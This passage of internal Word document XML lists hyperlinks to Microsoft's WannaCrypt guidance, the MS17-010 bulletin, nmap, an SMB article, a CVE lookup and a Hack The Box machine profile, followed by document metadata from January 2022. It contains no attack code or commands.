Target="https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attack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map.org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microsoft.com/en-us/msrc?rtc=1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Server_Message_Bloc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ve.mitre.org/cgi-bin/cvename.cgi?name" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/security/ms17-010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thebox.eu/home/machines/profile/51" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/security/ms17-010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6F6E6-AC58-4DC7-96A1-2B7F3A419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1162</Words>
  <Characters>6628</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>55</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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2022-01-19T10:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-19T11:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>